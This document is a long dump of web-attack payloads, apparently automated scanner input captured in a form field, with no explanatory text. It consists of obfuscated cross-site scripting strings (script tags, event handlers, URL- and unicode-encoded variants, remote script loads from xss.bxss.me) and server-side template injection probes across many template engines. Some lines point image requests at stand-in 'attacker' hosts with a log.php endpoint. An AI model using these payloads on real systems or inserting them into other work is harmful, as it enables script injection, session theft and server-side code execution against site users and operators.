<%={{={@{#{${dfb}}%>

555<ifRAme sRc=9804.com></IfRamE>

555

555<ScRiPt >GkuJ(9316)</ScRiPt>

"}dfb{98991*97996}xca

"}dfb#{98991*97996}xca

<th:t="${dfb}#foreach

555

555<svg \xa0onload=GkuJ(9589)

"}dfb${98991*97996}xca

"}dfb{#98991*97996}xca

555<img src=//xss.bxss.me/t/dot.gif onload=GzNg(9745)>

555<isindex type=image src=1 onerror=BVmy(9854)>

<th:t="${dfb}#foreach

555

555<isindex type=image src=1 onerror=GkuJ(9467)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=GzNg(9079)>

555<auWq7Qh x=9154>

"}dfb{@98991*97996}xca

"}dfb#{98991*97996}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<iframe src='data:text/html

555<iframe src='data:text/html

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555'"()&%<zzz><ScRiPt >2hYL(9487)</ScRiPt>

'"()&%<zzz><ScRiPt >2hYL(9148)</ScRiPt>

5559933982

555<body onload=BVmy(9651)>

555<img sRc='http://attacker-9685/log.php?

555<img src=xyz OnErRor=BVmy(9924)>

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

555<img/src=">" onerror=alert(9711)>

"}}dfb{{=98991*97996}}xca

555<img/src=">" onerror=alert(9183)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

"}dfb{#98991*97996}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%7A%4E%67%289128%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >MNTL(9253)</ScRiPt>

")dfb@(98991*97996)xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%42%56%6D%79%289835%29%3C%2F%73%43%72%69%70%54%3E

dfb{{98991*97996}}xca

555<body onload=GkuJ(9800)>

"}dfb{@98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"%>dfb<%=98991*97996%>xca

555\u003CScRiPt\BVmy(9416)\u003C/sCripT\u003E

555\u003CScRiPt\GzNg(9184)\u003C/sCripT\u003E

555<W6HDPW>8ELGQ[!+!]</W6HDPW>

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=GkuJ(9805)>

"}dfb#set($x=98991*97996)${x}xca

"}}dfb{{=98991*97996}}xca

555&lt

555<script>MNTL(9518)</script>

555&lt

555<ScRiPt >sJ1N(9695)</ScRiPt>

"}dfb{{"abc"|title}}xca

555<img src=xyz OnErRor=GkuJ(9286)>

")dfb@(98991*97996)xca

\xf6<img zzz onmouseover=BVmy(93691) //\xf6>

dfb__${98991*97996}__::.x

"print("dfb" . 98991*97996 . "xca")

\xf6<img zzz onmouseover=GzNg(91761) //\xf6>

555<ScR<ScRiPt>IpT>MNTL(9751)</sCr<ScRiPt>IpT>

555<img/src=">" onerror=alert(9124)>

555<WVM0WB>YKYFU[!+!]</WVM0WB>

555<script>sJ1N(9613)</script>

555<input autofocus onfocus=BVmy(9921)>

"%>dfb<%=98991*97996%>xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%6B%75%4A%289914%29%3C%2F%73%43%72%69%70%54%3E

"98991*97996*98991*97996

555<input autofocus onfocus=GzNg(9013)>

555<ScRiPt >MNTL(9243)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"}dfb#set($x=98991*97996)${x}xca

555<ScR<ScRiPt>IpT>sJ1N(9604)</sCr<ScRiPt>IpT>

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\GkuJ(9837)\u003C/sCripT\u003E

555<ScRiPt >UKHL(9361)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9824></ScRiPt>

555<ScRiPt >sJ1N(9665)</ScRiPt>

"}dfb{{"abc"|title}}xca

<a HrEF=jaVaScRiPT:>

"}}}dfb{{{this}}}xca

<a HrEF=jaVaScRiPT:>

555&lt

555<W1JSTD>Z3KBA[!+!]</W1JSTD>

"}#{98991*97996*98991*97996}

"print("dfb" . 98991*97996 . "xca")

555<ScRiPt >MNTL(9723)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9250></ScRiPt>

\xf6<img zzz onmouseover=GkuJ(95351) //\xf6>

555<script>UKHL(9292)</script>

555}body{zzz:Expre/**/SSion(GzNg(9847))}

555}body{zzz:Expre/**/SSion(BVmy(9203))}

"}dfb#{xca}=123

555<input autofocus onfocus=GkuJ(9086)>

555<svg \xa0onload=MNTL(9579)

555<ScRiPt >sJ1N(9355)</ScRiPt>

"98991*97996*98991*97996

555OaYH9 <ScRiPt >GzNg(9990)</ScRiPt>

555<ScR<ScRiPt>IpT>UKHL(9784)</sCr<ScRiPt>IpT>

555D9YO3 <ScRiPt >BVmy(9385)</ScRiPt>

"}}dfb{{'abcd'.toUpperCase()}}xca

<a HrEF=http://xss.bxss.me></a>

555<WCXGC9>2U0XT[!+!]</WCXGC9>

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScRiPt >UKHL(9965)</ScRiPt>

555<svg \xa0onload=sJ1N(9805)

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<isindex type=image src=1 onerror=MNTL(9683)>

"}}}dfb{{{this}}}xca

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9431></ScRiPt>

555<WHHMBF>B4QHM[!+!]</WHHMBF>

555<ifRAme sRc=9767.com></IfRamE>

"}#{98991*97996*98991*97996}

"}}dfb{{98991*97996}}xca

555<ScRiPt >UKHL(9491)</ScRiPt>

555<isindex type=image src=1 onerror=sJ1N(9720)>

555}body{zzz:Expre/**/SSion(GkuJ(9595))}

555<ifRAme sRc=9975.com></IfRamE>

555<aSsmpJp x=9174>

"}dfb[[${98991*97996}]]xca

"}dfb#{xca}=123

555<svg \xa0onload=UKHL(9077)

555<iframe src='data:text/html

555TAe6y <ScRiPt >GkuJ(9978)</ScRiPt>

555<img sRc='http://attacker-9360/log.php?

555<iframe src='data:text/html

555<aZxKiOL x=9025>

"dfb__${98991*97996}__::.x

555<WHYRHB>FPMJU[!+!]</WHYRHB>

555<isindex type=image src=1 onerror=UKHL(9369)>

555<body onload=MNTL(9003)>

"}}dfb{{'abcd'.toUpperCase()}}xca

555<anJafVf<

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=sJ1N(9221)>

555<img sRc='http://attacker-9630/log.php?

555<ifRAme sRc=9731.com></IfRamE>

'}}dfb{{98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=MNTL(9169)>

555<iframe src='data:text/html

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<aC82swM<

555<img src=//xss.bxss.me/t/dot.gif onload=sJ1N(9829)>

'%}dfb{{98991*97996}}xca

555<aCUGcum x=9466>

555<body onload=UKHL(9691)>

555'"()&%<zzz><ScRiPt >MHoH(9761)</ScRiPt>

555<img src=xyz OnErRor=MNTL(9883)>

"}}dfb{{98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=UKHL(9990)>

555<img src=xyz OnErRor=sJ1N(9961)>

'}dfb{98991*97996}xca

555<img/src=">" onerror=alert(9900)>

'"()&%<zzz><ScRiPt >MHoH(9455)</ScRiPt>

"}dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9150/log.php?

555<img/src=">" onerror=alert(9588)>

555<img src=xyz OnErRor=UKHL(9580)>

555<atXqQKJ<

"dfb__${98991*97996}__::.x

'}dfb${98991*97996}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%4A%31%4E%289453%29%3C%2F%73%43%72%69%70%54%3E

5559388078

'}dfb#{98991*97996}xca

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%4E%54%4C%289410%29%3C%2F%73%43%72%69%70%54%3E

555<img/src=">" onerror=alert(9207)>

bfg4140\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4140

555\u003CScRiPt\sJ1N(9405)\u003C/sCripT\u003E

'}dfb{#98991*97996}xca

'}}dfb{{98991*97996}}xca

555\u003CScRiPt\MNTL(9704)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%55%4B%48%4C%289330%29%3C%2F%73%43%72%69%70%54%3E

bfgx10552\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10552

555&lt

'}dfb{@98991*97996}xca

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\UKHL(9890)\u003C/sCripT\u003E

555&lt

'%}dfb{{98991*97996}}xca

555

\xf6<img zzz onmouseover=sJ1N(98051) //\xf6>

'}}dfb{{=98991*97996}}xca

555&lt

'}dfb{98991*97996}xca

555'"()&%<zzz><ScRiPt >8K1r(9789)</ScRiPt>

\xf6<img zzz onmouseover=MNTL(95831) //\xf6>

555<input autofocus onfocus=sJ1N(9921)>

\xf6<img zzz onmouseover=UKHL(92511) //\xf6>

<th:t="${dfb}#foreach

'"()&%<zzz><ScRiPt >8K1r(9266)</ScRiPt>

555<input autofocus onfocus=MNTL(9192)>

'}dfb${98991*97996}xca

')dfb@(98991*97996)xca

<a HrEF=http://xss.bxss.me></a>

555

555<input autofocus onfocus=UKHL(9761)>

'%>dfb<%=98991*97996%>xca

<a HrEF=http://xss.bxss.me></a>

5559324182

<a HrEF=jaVaScRiPT:>

'}dfb#{98991*97996}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

bfg9424\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9424

555}body{zzz:Expre/**/SSion(sJ1N(9538))}

'}dfb#set($x=98991*97996)${x}xca

'}dfb{#98991*97996}xca

555

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(MNTL(9690))}

'}dfb{{"abc"|title}}xca

'}dfb{@98991*97996}xca

555NToxb <ScRiPt >sJ1N(9655)</ScRiPt>

bfgx8304\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8304

'print("dfb" . 98991*97996 . "xca")

555}body{zzz:Expre/**/SSion(UKHL(9652))}

'}}dfb{{=98991*97996}}xca

dfb{{98991*97996}}xca

555Fsm6S <ScRiPt >MNTL(9463)</ScRiPt>

555<WLZSQF>M4EGU[!+!]</WLZSQF>

'98991*97996*98991*97996

<%={{={@{#{${dfb}}%>

5553yBfk <ScRiPt >UKHL(9888)</ScRiPt>

')dfb@(98991*97996)xca

555<WQOLL5>SRIUV[!+!]</WQOLL5>

dfb[[${98991*97996}]]xca

555<ifRAme sRc=9418.com></IfRamE>

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<WQ4ZJP>X3ZKT[!+!]</WQ4ZJP>

555<ifRAme sRc=9199.com></IfRamE>

'%>dfb<%=98991*97996%>xca

555<aAb7pPq x=9549>

<th:t="${dfb}#foreach

dfb__${98991*97996}__::.x

'}}}dfb{{{this}}}xca

555<ifRAme sRc=9423.com></IfRamE>

555<a1bZ82e x=9035>

555<img sRc='http://attacker-9258/log.php?

'}dfb#set($x=98991*97996)${x}xca

'}#{98991*97996*98991*97996}

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<asC0p7u x=9425>

555<img sRc='http://attacker-9102/log.php?

555<alQyK6v<

'}dfb#{xca}=123

'}dfb{{"abc"|title}}xca

555<ScRiPt >MHoH(9773)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9356/log.php?

'print("dfb" . 98991*97996 . "xca")

'}}dfb{{'abcd'.toUpperCase()}}xca

555<a8FUEIf<

555<WAQY0A>J6U7C[!+!]</WAQY0A>

555

555<aullopP<

555<script>MHoH(9584)</script>

'98991*97996*98991*97996

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

"}}dfb{{98991*97996}}xca

555<ScR<ScRiPt>IpT>MHoH(9259)</sCr<ScRiPt>IpT>

'}}dfb{{98991*97996}}xca

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScRiPt >MHoH(9647)</ScRiPt>

"%}dfb{{98991*97996}}xca

'}dfb[[${98991*97996}]]xca

'}}}dfb{{{this}}}xca

'dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9448></ScRiPt>

"}dfb{98991*97996}xca

'}#{98991*97996*98991*97996}

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >MHoH(9070)</ScRiPt>

"}dfb${98991*97996}xca

'}dfb#{xca}=123

1}}dfb{{98991*97996}}xca

"}dfb#{98991*97996}xca

555<svg \xa0onload=MHoH(9275)

555'"()&%<zzz><ScRiPt >yADA(9081)</ScRiPt>

'}}dfb{{'abcd'.toUpperCase()}}xca

1%}dfb{{98991*97996}}xca

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<isindex type=image src=1 onerror=MHoH(9046)>

'"()&%<zzz><ScRiPt >yADA(9567)</ScRiPt>

'}}dfb{{98991*97996}}xca

"}dfb{#98991*97996}xca

1}dfb{98991*97996}xca

555<iframe src='data:text/html

5559306766

'}dfb[[${98991*97996}]]xca

1}dfb${98991*97996}xca

"}dfb{@98991*97996}xca

555'"()&%<zzz><ScRiPt >WyGL(9435)</ScRiPt>

555<body onload=MHoH(9407)>

bfg8830\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8830

"}}dfb{{=98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=MHoH(9084)>

'"()&%<zzz><ScRiPt >WyGL(9090)</ScRiPt>

bfgx6153\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6153

'dfb__${98991*97996}__::.x

")dfb@(98991*97996)xca

555<img src=xyz OnErRor=MHoH(9301)>

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

555<img/src=">" onerror=alert(9291)>

5559760870

1}dfb#{98991*97996}xca

"%>dfb<%=98991*97996%>xca

1}}dfb{{98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%48%6F%48%289024%29%3C%2F%73%43%72%69%70%54%3E

555

1}dfb{#98991*97996}xca

1%}dfb{{98991*97996}}xca

bfg6313\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6313

"}dfb#set($x=98991*97996)${x}xca

1}dfb{@98991*97996}xca

<th:t="${dfb}#foreach

555\u003CScRiPt\MHoH(9118)\u003C/sCripT\u003E

555

"}dfb{{"abc"|title}}xca

1}dfb{98991*97996}xca

bfgx6252\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6252

1}}dfb{{=98991*97996}}xca

555&lt

1)dfb@(98991*97996)xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"print("dfb" . 98991*97996 . "xca")

1}dfb${98991*97996}xca

<%={{={@{#{${dfb}}%>

"98991*97996*98991*97996

\xf6<img zzz onmouseover=MHoH(92391) //\xf6>

555

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

1}dfb#{98991*97996}xca

<th:t="${dfb}#foreach

555

1%>dfb<%=98991*97996%>xca

555<input autofocus onfocus=MHoH(9379)>

"}}}dfb{{{this}}}xca

1}dfb{#98991*97996}xca

dfb{{98991*97996}}xca

1}dfb#set($x=98991*97996)${x}xca

"}#{98991*97996*98991*97996}

<a HrEF=http://xss.bxss.me></a>

555

1}dfb{@98991*97996}xca

1}dfb{{"abc"|title}}xca

dfb[[${98991*97996}]]xca

1print("dfb" . 98991*97996 . "xca")

"}dfb#{xca}=123

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

198991*97996*98991*97996

1}}dfb{{=98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"}}dfb{{'abcd'.toUpperCase()}}xca

555}body{zzz:Expre/**/SSion(MHoH(9269))}

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1)dfb@(98991*97996)xca

555

555'"()&%<zzz><ScRiPt >bkv9(9757)</ScRiPt>

555'"()&%<zzz><ScRiPt >CRFZ(9234)</ScRiPt>

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555MVEaP <ScRiPt >MHoH(9406)</ScRiPt>

555<ScRiPt >yADA(9768)</ScRiPt>

1}}}dfb{{{this}}}xca

'"()&%<zzz><ScRiPt >bkv9(9356)</ScRiPt>

dfb{{98991*97996}}xca

1%>dfb<%=98991*97996%>xca

555'"()&%<zzz><ScRiPt >fdDm(9688)</ScRiPt>

'"()&%<zzz><ScRiPt >CRFZ(9164)</ScRiPt>

dfb[[${98991*97996}]]xca

555<WGBAXK>AYRNE[!+!]</WGBAXK>

"}}dfb{{98991*97996}}xca

1}#{98991*97996*98991*97996}

1}dfb#set($x=98991*97996)${x}xca

'"()&%<zzz><ScRiPt >fdDm(9257)</ScRiPt>

555<WXDW2W>UVJGB[!+!]</WXDW2W>

5559680448

555'"()&%<zzz><ScRiPt >WjEX(9003)</ScRiPt>

1}dfb{{"abc"|title}}xca

"}dfb[[${98991*97996}]]xca

555<ifRAme sRc=9166.com></IfRamE>

5559663903

dfb__${98991*97996}__::.x

1}dfb#{xca}=123

"dfb__${98991*97996}__::.x

1print("dfb" . 98991*97996 . "xca")

555<script>yADA(9098)</script>

bfg1771\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1771

5559968333

555'"()&%<zzz><ScRiPt >QAQp(9793)</ScRiPt>

'"()&%<zzz><ScRiPt >WjEX(9040)</ScRiPt>

555<alnSPJk x=9815>

bfg9229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9229

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>yADA(9952)</sCr<ScRiPt>IpT>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1}}dfb{{'abcd'.toUpperCase()}}xca

5559146129

'"()&%<zzz><ScRiPt >QAQp(9691)</ScRiPt>

bfg1967\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1967

bfgx5162\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5162

198991*97996*98991*97996

bfg5998\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5998

5559401433

'}}dfb{{98991*97996}}xca

555<img sRc='http://attacker-9570/log.php?

555<ScRiPt >yADA(9499)</ScRiPt>

bfgx9852\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9852

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

<%={{={@{#{${dfb}}%>

bfgx9691\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9691

555<ScRiPt >WyGL(9807)</ScRiPt>

bfgx6397\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6397

555

bfg8598\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8598

555<a7sEnOC<

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9619></ScRiPt>

<%={{={@{#{${dfb}}%>

1}}dfb{{98991*97996}}xca

1}}}dfb{{{this}}}xca

'%}dfb{{98991*97996}}xca

bfgx1167\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1167

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555<WMRIFK>BHLRI[!+!]</WMRIFK>

'}dfb{98991*97996}xca

555<ScRiPt >yADA(9425)</ScRiPt>

1}#{98991*97996*98991*97996}

555

<%={{={@{#{${dfb}}%>

1}dfb[[${98991*97996}]]xca

555

'}dfb${98991*97996}xca

555

555<script>WyGL(9753)</script>

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

1dfb__${98991*97996}__::.x

555<svg \xa0onload=yADA(9423)

555

1}dfb#{xca}=123

'}dfb#{98991*97996}xca

dfb{{98991*97996}}xca

555<ScR<ScRiPt>IpT>WyGL(9921)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=yADA(9723)>

1}}dfb{{'abcd'.toUpperCase()}}xca

555<ScRiPt >WyGL(9989)</ScRiPt>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

dfb{98991*97996}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9530></ScRiPt>

dfb{{98991*97996}}xca

'}dfb{#98991*97996}xca

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<th:t="${dfb}#foreach

555

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555

555'"()&%<zzz><ScRiPt >LyWo(9050)</ScRiPt>

555

dfb{{98991*97996}}xca

555<ScRiPt >WyGL(9346)</ScRiPt>

dfb${98991*97996}xca

555<iframe src='data:text/html

555<ScRiPt >zcb4(9574)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{98991*97996}xca

555<svg \xa0onload=WyGL(9296)

'"()&%<zzz><ScRiPt >LyWo(9618)</ScRiPt>

'}dfb{@98991*97996}xca

1}}dfb{{98991*97996}}xca

1}dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

5559190641

555

dfb[[${98991*97996}]]xca

dfb#{98991*97996}xca

555

555<body onload=yADA(9444)>

555<WNSFB9>OH0NB[!+!]</WNSFB9>

555'"()&%<zzz><ScRiPt >JyYT(9953)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=yADA(9680)>

dfb${98991*97996}xca

555'"()&%<zzz><ScRiPt >HUu0(9314)</ScRiPt>

dfb#{98991*97996}xca

dfb{#98991*97996}xca

dfb{#98991*97996}xca

dfb{{98991*97996}}xca

dfb{@98991*97996}xca

dfb__${98991*97996}__::.x

'}}dfb{{=98991*97996}}xca

555<script>zcb4(9079)</script>

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >HUu0(9130)</ScRiPt>

dfb{{=98991*97996}}xca

dfb[[${98991*97996}]]xca

dfb{@98991*97996}xca

'"()&%<zzz><ScRiPt >JyYT(9035)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScR<ScRiPt>IpT>zcb4(9761)</sCr<ScRiPt>IpT>

')dfb@(98991*97996)xca

5559373004

dfb[[${98991*97996}]]xca

555<ScRiPt >5bDH(9591)</ScRiPt>

dfb__${98991*97996}__::.x

5559760342

dfb@(98991*97996)xca

dfb{{=98991*97996}}xca

555<ScRiPt >bkv9(9238)</ScRiPt>

'%>dfb<%=98991*97996%>xca

555<ScRiPt >zcb4(9243)</ScRiPt>

bfg6848\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6848

dfb__${98991*97996}__::.x

555<WSQS9H>HZKWG[!+!]</WSQS9H>

dfb<%=98991*97996%>xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb@(98991*97996)xca

'}dfb#set($x=98991*97996)${x}xca

555<WEQAO6>IQ7G9[!+!]</WEQAO6>

bfg4208\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4208

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx8756\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8756

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9245></ScRiPt>

555<script>5bDH(9027)</script>

'}dfb{{"abc"|title}}xca

555<ScRiPt >QAQp(9990)</ScRiPt>

bfgx6455\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6455

dfb#set($x=98991*97996)${x}xca

dfb<%=98991*97996%>xca

555<script>bkv9(9773)</script>

555<ScRiPt >WjEX(9975)</ScRiPt>

555<WBV2TF>H6K4C[!+!]</WBV2TF>

<%={{={@{#{${dfb}}%>

dfb{{"abc"|title}}xca

555<ScR<ScRiPt>IpT>5bDH(9463)</sCr<ScRiPt>IpT>

555<ScRiPt >zcb4(9126)</ScRiPt>

<%={{={@{#{${dfb}}%>

'print("dfb" . 98991*97996 . "xca")

555<ScR<ScRiPt>IpT>bkv9(9571)</sCr<ScRiPt>IpT>

dfb#set($x=98991*97996)${x}xca

555<ScRiPt >5bDH(9706)</ScRiPt>

print("dfb" . 98991*97996 . "xca")

555<WZ62W6>FXW5X[!+!]</WZ62W6>

555<script>QAQp(9230)</script>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9083></ScRiPt>

555<svg \xa0onload=zcb4(9651)

555

555

555<ScRiPt >bkv9(9560)</ScRiPt>

555<ScRiPt >5bDH(9867)</ScRiPt>

'98991*97996*98991*97996

98991*97996*98991*97996

dfb{{"abc"|title}}xca

555<svg \xa0onload=5bDH(9517)

555<script>WjEX(9155)</script>

555<ScR<ScRiPt>IpT>QAQp(9978)</sCr<ScRiPt>IpT>

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9176></ScRiPt>

555<isindex type=image src=1 onerror=zcb4(9375)>

<th:t="${dfb}#foreach

print("dfb" . 98991*97996 . "xca")

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<iframe src='data:text/html

555<ScRiPt >bkv9(9124)</ScRiPt>

555<ScR<ScRiPt>IpT>WjEX(9846)</sCr<ScRiPt>IpT>

555<ScRiPt >QAQp(9751)</ScRiPt>

555

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<isindex type=image src=1 onerror=5bDH(9350)>

555'"()&%<zzz><ScRiPt >gkFz(9278)</ScRiPt>

98991*97996*98991*97996

'}}}dfb{{{this}}}xca

555

555<body onload=zcb4(9029)>

555<iframe src='data:text/html

dfb{{{this}}}xca

555<svg \xa0onload=bkv9(9851)

555<ScRiPt >WjEX(9086)</ScRiPt>

555'"()&%<zzz><ScRiPt >PClX(9914)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9666></ScRiPt>

555'"()&%<zzz><ScRiPt >Vh68(9266)</ScRiPt>

'"()&%<zzz><ScRiPt >gkFz(9372)</ScRiPt>

555<body onload=5bDH(9049)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'}#{98991*97996*98991*97996}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

#{98991*97996*98991*97996}

555<isindex type=image src=1 onerror=bkv9(9127)>

555<img src=//xss.bxss.me/t/dot.gif onload=5bDH(9134)>

'"()&%<zzz><ScRiPt >Vh68(9152)</ScRiPt>

'"()&%<zzz><ScRiPt >PClX(9371)</ScRiPt>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScRiPt >QAQp(9543)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=zcb4(9546)>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9250></ScRiPt>

555

'}dfb#{xca}=123

5559172328

555<iframe src='data:text/html

5559130724

5559625913

dfb#{xca}=123

dfb{{98991*97996}}xca

dfb{{{this}}}xca

555<img src=xyz OnErRor=5bDH(9100)>

555<img src=xyz OnErRor=zcb4(9472)>

555<svg \xa0onload=QAQp(9007)

dfb{{98991*97996}}xca

'}}dfb{{'abcd'.toUpperCase()}}xca

bfg7070\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7070

bfg4531\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4531

dfb{{'abcd'.toUpperCase()}}xca

dfb[[${98991*97996}]]xca

555<ScRiPt >WjEX(9162)</ScRiPt>

#{98991*97996*98991*97996}

bfg6027\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6027

555<body onload=bkv9(9956)>

555<img/src=">" onerror=alert(9476)>

555<img/src=">" onerror=alert(9475)>

555<isindex type=image src=1 onerror=QAQp(9720)>

bfgx8608\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8608

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

dfb[[${98991*97996}]]xca

555<svg \xa0onload=WjEX(9245)

dfb#{xca}=123

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%63%62%34%289357%29%3C%2F%73%43%72%69%70%54%3E

bfgx7019\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7019

bfgx1909\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1909

%35%35%35%3C%53%63%52%69%50%74%20%3E%35%62%44%48%289772%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=bkv9(9381)>

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

